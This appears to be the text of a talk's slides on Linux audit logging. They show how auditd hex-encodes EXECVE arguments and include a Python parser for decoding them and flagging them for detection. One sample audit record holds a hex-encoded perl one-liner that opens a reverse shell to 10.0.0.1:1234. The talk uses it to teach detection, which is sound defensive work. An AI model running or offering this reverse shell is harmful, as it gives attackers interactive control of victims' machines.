Hilko Bengen
2024-10-25
/var/log/messages, /var/log/auth.log
sudo, ssh, cron, etc.

type=SYSCALL msg=audit(1626611363.720:348501): …
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B657428532C50465F494E45542C534F434B5F5354524541 4D2C67657470726F746F62796E616D6528227463702229293B696628636F6E6E65637428532C736F636B616464725F696E2824702C696E65745F61746F6E282469292929297B6F70656E28535444494E2C223E265322293B6F70656E285354444F55542C223E265322293B6F70656E285354444552522C223E265322293B6578656328222F62696E2F7368202D6922293B7D3B
type=CWD msg=audit(1626611363.720:348501): …
So, what is this EXECVE.a2?
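The a2 value above is not corrupted: auditd emits a field in quotes only when it is "safe", and falls back to an unquoted hex string whenever the value contains a double quote, a space, a control character or a non-ASCII byte, which is exactly what an inline interpreter script passed after -e or -c looks like. The following parser, added here as an illustration and not part of the talk, shows how to recover argv from an EXECVE record and how to flag arguments that arrived hex-encoded. The sample record is constructed for this example (a harmless perl one-liner); the function names and the field regex are this example's own, not auditd's API.

```python
import re
from typing import Dict, List

# Constructed sample EXECVE record (not the record from the talk). The a2 argument
# is hex-encoded because the one-liner contains spaces and double quotes.
SAMPLE_EXECVE = (
    'type=EXECVE msg=audit(1700000000.000:4242): argc=3 a0="perl" a1="-e" '
    'a2=7072696E74202268656C6C6F2C2061756469745C6E223B'
)

# key=value pairs; a value is either a double-quoted string or a run of non-spaces.
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
# An unquoted value made only of whole hex bytes.
HEX_RE = re.compile(r'^(?:[0-9A-Fa-f]{2})+$')
ARG_KEY_RE = re.compile(r'^a\d+$')


def parse_record(line: str) -> Dict[str, str]:
    """Split one audit record into its raw key=value fields (values left undecoded)."""
    return {key: raw for key, raw in FIELD_RE.findall(line)}


def is_hex_encoded(key: str, raw: str) -> bool:
    """True when an argument field was emitted by auditd in its hex fallback form."""
    return bool(ARG_KEY_RE.match(key)) and not raw.startswith('"') and bool(HEX_RE.match(raw))


def decode_field(key: str, raw: str) -> str:
    """Undo auditd's string encoding: strip quotes, or hex-decode an aN argument.

    Only argument fields (a0, a1, ...) are hex-decoded here; numeric fields such as
    argc stay as they are. Very long arguments that auditd splits into aN_len/aN[k]
    pieces are not handled by this example.
    """
    if raw.startswith('"') and raw.endswith('"') and len(raw) >= 2:
        return raw[1:-1]
    if is_hex_encoded(key, raw):
        return bytes.fromhex(raw).decode('utf-8', errors='replace')
    return raw


def execve_argv(line: str) -> List[str]:
    """Rebuild the argv of an EXECVE record in the order the process received it."""
    fields = parse_record(line)
    if fields.get('type') != 'EXECVE':
        raise ValueError('not an EXECVE record')
    argc = int(fields['argc'])
    return [decode_field(f'a{i}', fields[f'a{i}']) for i in range(argc)]


def hex_encoded_arg_indices(line: str) -> List[int]:
    """Indices of arguments that auditd had to hex-encode.

    For a detection engineer this is the interesting signal: an interpreter
    (perl, python, sh) whose argument after -e/-c was hex-encoded received an
    inline script with spaces or quotes, which is worth surfacing for review.
    """
    fields = parse_record(line)
    argc = int(fields.get('argc', '0'))
    return [i for i in range(argc) if is_hex_encoded(f'a{i}', fields[f'a{i}'])]


if __name__ == '__main__':
    print(execve_argv(SAMPLE_EXECVE))
    print('hex-encoded args:', hex_encoded_arg_indices(SAMPLE_EXECVE))
```

Run against a live log, the same decoding is what `ausearch -i` performs when it prints an EXECVE record in interpreted form; the point of doing it by hand is that a SIEM rule working on the raw text has to apply it too, otherwise a search for `perl -e` or `sh -c` with a quoted script never matches the hex form.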
"Linux Audit – Usable, Robust, Easy Logging"
CreateProcess. What is fork, exec?
"root = 'S-1-5-18'. Everybody knows that"
ps
netstat
Hilko Bengen <bengen@hilluzination.de>
https://github.com/hillu | @hillu@infosec.exchange |
Slides are available online: